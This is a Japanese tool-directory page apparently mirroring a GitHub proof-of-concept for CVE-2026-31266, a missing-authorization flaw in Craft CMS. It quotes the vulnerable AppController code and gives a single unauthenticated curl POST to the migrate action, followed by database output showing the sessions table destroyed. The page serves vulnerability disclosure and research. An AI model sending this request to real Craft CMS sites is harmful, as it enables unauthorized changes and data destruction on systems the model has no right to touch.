Skip to content
KitploitKITPLOIT
ツールエクスプロイトブログ
Log in
提出
ツールエクスプロイトブログ
提出

ハッキング、侵入テスト、サイバーセキュリティツールをあなたのセキュリティアーセナルに!

Kitploitはハッキング、サイバーセキュリティ、ペネトレーションテストのツールディレクトリです。最新のプロジェクトアップデートを見つけて、脆弱性の発見、システム分析、テストの自動化、セキュリティの強化を行いましょう。

フィードお問い合わせプライバシー© 2026 Kitploit

ツールディレクトリ

カテゴリ

すべてのカテゴリを見る
Loading categories
Craftcms-PoC-CVE-2026-31266 — Craft CMSの認証メカニズムに関するセキュリティ研究 | Kitploit
ツール/GitHubGitHub/0xrixet/craftcms-poc-cve-2026-31266
認証と認可脆弱性分析エクスプロイトウェブアプリケーション悪用ペネトレーションテスト認証
GitHub0xrixet/craftcms-poc-cve-2026-31266

Craftcms-PoC-CVE-2026-31266

Craft CMSの認証メカニズムに関するセキュリティ研究

リポジトリを見る
383ヶ月前未レビュー

人気

すべて見る →

コミュニティで最も使われているツールを見つけましょう。

すべてのツールを探索

ツールコレクションを閲覧

すべてのツールを見る →
共有

CVE-2026-31266 - Craft CMS 認可の欠落

CVE 情報

フィールド値
CVE IDCVE-2026-31266
ベンダーPixel & Tonic
製品Craft CMS
影響を受けるバージョン<= 5.9.5
CWECWE-862 (認可の欠落)
CVSS7.3 (高)
セキュリティ研究者0xRIXET

証拠の内容

  • screenshots/ - 概念実証のデモ

脆弱性

  • タイプ: 認可の欠落
  • 影響: 認証バイパス
  • ベンダー: Craft CMS
  • ステータス: CVE-2026-31266

脆弱なコード

ファイル: src/controllers/AppController.php

行 65-68:

protected array|bool|int $allowAnonymous = [
    'migrate' => self::ALLOW_ANONYMOUS_LIVE | self::ALLOW_ANONYMOUS_OFFLINE,
];

概念実証

# With allowAdminChanges=false
curl -X POST "http://target/actions/app/migrate"

証拠

攻撃前:

mysql> SELECT COUNT(*) FROM sessions;
+----------+
| COUNT(*) |
+----------+
|        0 |
+----------+

攻撃後:

mysql> SELECT COUNT(*) FROM sessions;
ERROR 1146 (42S02): Table 'sessions' doesn't exist

参考文献

  • Craft CMS リポジトリ
  • Craftセキュリティドキュメント
  • NVDエントリ

連絡先

  • セキュリティ研究者: 0xRIXET | Mohammed Al-shehri
  • Twitter | X : @0xRIXET
  • メール: [email protected]
ツールをダウンロード